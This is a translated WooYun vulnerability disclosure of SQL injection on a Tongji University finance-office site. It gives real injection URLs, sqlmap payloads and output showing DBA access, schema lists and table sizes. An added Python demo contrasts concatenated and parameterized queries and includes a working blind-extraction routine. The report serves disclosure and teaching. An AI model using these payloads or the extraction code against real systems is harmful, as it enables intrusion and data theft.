Vulnerability summary

Defect ID: wooyun-2015-0162438

Title: SQL injection on a Tongji University site

Vendor: Tongji University

Author: 40huo

Submitted: 2015-12-18 17:40

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-18: details sent to the vendor, awaiting vendor action
2015-12-19: vendor confirmed; details visible to the vendor only
2015-12-29: details disclosed to core white hats and domain experts
2016-01-08: details disclosed to regular white hats
2016-01-18: details disclosed to intern white hats
2016-02-01: details disclosed to the public

Brief description:

SQL injection on a Tongji University site, with large-scale information disclosure.

Detailed description:

Injection point 1: http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=qwe
Type (sqlmap output):

Parameter: qry (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: qry=-2054' OR 5656=5656 AND 'PodT' LIKE 'PodT

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qry=qwe' AND 5341=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(74)||CHR(114)||CHR(105),5) AND 'OeaF' LIKE 'OeaF

The second payload is an Oracle-specific delay primitive: DBMS_PIPE.RECEIVE_MESSAGE waits up to 5 seconds on a pipe (named by the CHR() string) that nothing ever writes to, so a response delayed by about 5 seconds confirms that the database evaluated the injected expression.
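The boolean-based blind payload is easiest to understand with the vulnerable query pattern beside its fix. The following is an added example written for this page, not code from the report or from the site. It uses an in-memory SQLite database in place of Oracle (so the DBMS_PIPE.RECEIVE_MESSAGE time-based payload is not reproduced), a constructed NEWSINFO table whose column names (id, title) are assumed, and a LIKE '%...%' search shape that is also an assumption about newsList.jsp. It goes one step beyond the single check above: extract_blind recovers a string character by character through the same true/false oracle, which is the mechanism by which a blind injection yields the DBA flag and schema list shown later in the report.

```python
import sqlite3

# Constructed sample rows standing in for the CWBS.NEWSINFO table named in the
# report. The column names (id, title) are an assumption; the page shows only
# table names and row counts.
SAMPLE_NEWS = [
    (1, "Reimbursement deadline for December"),
    (2, "Payroll schedule update"),
    (3, "Campus card fee notice"),
]

# The first string is the report's boolean-based payload; the second is its
# negated twin (constructed here; sqlmap sends both and compares responses).
TRUE_PAYLOAD = "-2054' OR 5656=5656 AND 'PodT' LIKE 'PodT"
FALSE_PAYLOAD = "-2054' OR 5656=5657 AND 'PodT' LIKE 'PodT"


def make_db():
    """In-memory SQLite stand-in for the Oracle back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NEWSINFO (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO NEWSINFO VALUES (?, ?)", SAMPLE_NEWS)
    return conn


def search_vulnerable(conn, qry):
    """The bug class behind newsList.jsp?qry=: the parameter is spliced into
    the SQL text, so a quote in qry closes the literal and the rest of the
    value becomes part of the WHERE clause."""
    sql = "SELECT id FROM NEWSINFO WHERE title LIKE '%" + qry + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, qry):
    """Same search with a bound parameter: the driver sends qry as data, so it
    can never change the statement's structure."""
    sql = "SELECT id FROM NEWSINFO WHERE title LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + qry + "%",))]


def blind_oracle(conn, condition):
    """Boolean-based blind probe in the shape of the report's payload.
    Injected WHERE: title LIKE '%-2054' OR <condition> AND 'PodT' LIKE 'PodT%'
    The '%-2054' branch matches nothing, so rows come back iff condition holds."""
    payload = "-2054' OR " + condition + " AND 'PodT' LIKE 'PodT"
    return len(search_vulnerable(conn, payload)) > 0


def extract_blind(conn, subquery, max_len=32):
    """Recover the value of a scalar subquery one character at a time using
    only the true/false oracle, without ever seeing query output."""
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_ "
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = "substr((%s),%d,1)='%s'" % (subquery, pos, ch)
            if blind_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of string (or char outside charset)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true  payload:", search_vulnerable(db, TRUE_PAYLOAD))
    print("vulnerable, false payload:", search_vulnerable(db, FALSE_PAYLOAD))
    print("fixed, true payload:      ", search_fixed(db, TRUE_PAYLOAD))
    print("blind extraction:", extract_blind(db, "SELECT title FROM NEWSINFO WHERE id=3"))
```

With the concatenated query, the true payload returns every row and the false payload returns none, which is exactly the difference sqlmap keys on; with the bound parameter, both payloads are just strings that match no title. The same oracle drives extract_blind, so the only real fix is the parameterized form, not filtering of quotes.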


Other injection points:
http://cwc.tongji.edu.cn/WFManager/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList4.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList5.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/wingsoft/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/wingsoft/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=%27%
http://cwc.tongji.edu.cn/WFManager/common/a.jsp?qry=%27

Proof of vulnerability:

DBA privileges:

web application technology: JSP
back-end DBMS: Oracle
[INFO] testing if current user is DBA
current user is DBA: True


78 databases involved (on Oracle, sqlmap lists schemas as databases):

web application technology: JSP
back-end DBMS: Oracle
available databases [78]:
[*] APEX_030200
[*] APPQOSSYS
[*] BUDGET_DRIVE
[*] CAMPUSCARD
[*] CJ
[*] CJ2
[*] CJCS
[*] CJSZCS
[*] CTXSYS
[*] CW_DEF
[*] CWBS
[*] CWBS_TMP
[*] CWBX
[*] DBSNMP
[*] EXFSYS
[*] FD
[*] FDSF
[*] FDSF1
[*] FDSFCX
[*] FDYS
[*] FLOWS_FILES
[*] GJ
[*] GZ1
[*] GZ2
[*] GZ3
[*] GZ4
[*] GZ5
[*] GZZ1
[*] GZZ3
[*] GZZ4
[*] MDSYS
[*] MSGSERVICE
[*] NEWGZ0
[*] NEWZXJ1
[*] NEWZXJ2
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PAY
[*] PAY_TEST
[*] SCOTT
[*] SERVICEFLAT
[*] SF_DEF
[*] SF_USERS
[*] SFHQ
[*] SFXX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WEBFEE
[*] WEBFEE1
[*] WEBFEE_CX
[*] WEBFEE_YJS
[*] WF0
[*] WF1
[*] WF3
[*] WF_CA
[*] WF_PAY
[*] WF_PAY_NEW
[*] WF_PRETICKET
[*] WF_PRETICKET_NEW
[*] WF_PZ
[*] WF_TIANYI
[*] WF_TICKET
[*] WF_YB
[*] WING
[*] WMSYS
[*] XDB
[*] XSSF
[*] XSSF1
[*] XSSF2
[*] XSSFCX1
[*] ZXJ1
[*] ZXJ2
[*] ZZGZ


The current database alone has 104 tables, with a large amount of sensitive information exposed:

web application technology: JSP
back-end DBMS: Oracle
Database: CWBS
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| REWARDS | 2286325 |
| DBANKLOG | 749052 | bank records?
| USERROLE | 663696 | user information?
| DBANKBILLS_BK | 570737 | bills?
| LASTBILL | 266342 |
| USERINFO | 241609 |
| REWARDFORM | 203574 |
| USERINFO_BACK_MSX | 166390 |
| DBANKBILLS | 160859 |
| REWARDMEMBER | 72383 |
| USERINFO_BAK | 46403 |
| USERB | 32419 |
| DBANKCODETABLE | 24872 |
| PROJQRYAPPLY | 18596 |
| PROJQRYLIST | 15464 |
| USERKU | 13154 |
| DBANKBILLAUTH | 10778 |
| SYSLOG | 10733 |
| USERC | 4598 |
| HIDEPRJLIST | 4525 |
| LASTREWARDTEAM | 4125 |
| BOARD | 3133 |
| TOPICINFO | 1265 |
| NEWSINFO | 515 |
| SALARY_STRUCTURE | 405 |
| DEPTINFO2 | 361 |
| COMMUNIONCONTENT_1 | 212 |
| MAILCONTENT | 196 |
| CWFILEITEM | 188 |
| CWFILEITEM2 | 175 |
| DBANKPARAMS | 54 |
| ROLEFUNCS | 51 |
| DEPTINFO1 | 37 |
| DBANKAUTHORITY | 24 |
| FEE_STRUCTURE | 24 |
| PARAMS | 20 |
| FUNCTYPEINFO | 19 |
| BBSADMIN | 18 |
| DBANKUSERS | 15 |
| LSTYLE | 14 |
| LSTYLE3 | 14 |
| DBINFO | 13 |
| USERDMPSCHEMA | 10 |
| INCOMEITEMINFO | 9 |
| NOCASHQRYFIELDSET | 7 |
| REWARDDEF | 7 |
| ROLEINFO | 7 |
| FEEQRYSET | 6 |
| INCOMEINFO | 6 |
| MENUINFO | 6 |
| GZPUBINFO | 5 |
| LSTYLE4 | 5 |
| XMQRYSET | 5 |
| CWFILEINFO | 4 |
| DKSET | 3 |
| INCOMETYPE | 3 |
| INSTANCEFORMAT | 2 |
| PROJ_QRY | 2 |
| COMMUNION | 1 |
| COMMUNIONDEF | 1 |
| CWINFOFIELD | 1 |
| CWINFOKEYFIELD | 1 |
| CWINFOMAINTAIN | 1 |
| FEESUMQRYSET | 1 |
| INCOMESUMINFO | 1 |
| INCOMESUMITEMINFO | 1 |
| INCOMETEAMINFO | 1 |
| INCOMETEAMITEMINFO | 1 |
| INTRODUCE | 1 |
| LYBK | 1 |
| NOCASHQRYSET | 1 |
| PZD_QRY | 1 |
| REPORTINFO | 1 |
| REPORTINSTANCE | 1 |
| ROLEFUNCCONDS | 1 |
| T1 | 1 |
+--------------------+---------+


The financial information is too sensitive, so I stopped looking there. That's it; I haven't even looked at the 70-odd other databases.

Remediation:

The Finance Office's website needs to be done properly.
This won't do...

Copyright notice: please credit 40huo@WooYun when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-12-19 14:05

Vendor reply:

Thanks for the heads-up!

Latest status:

None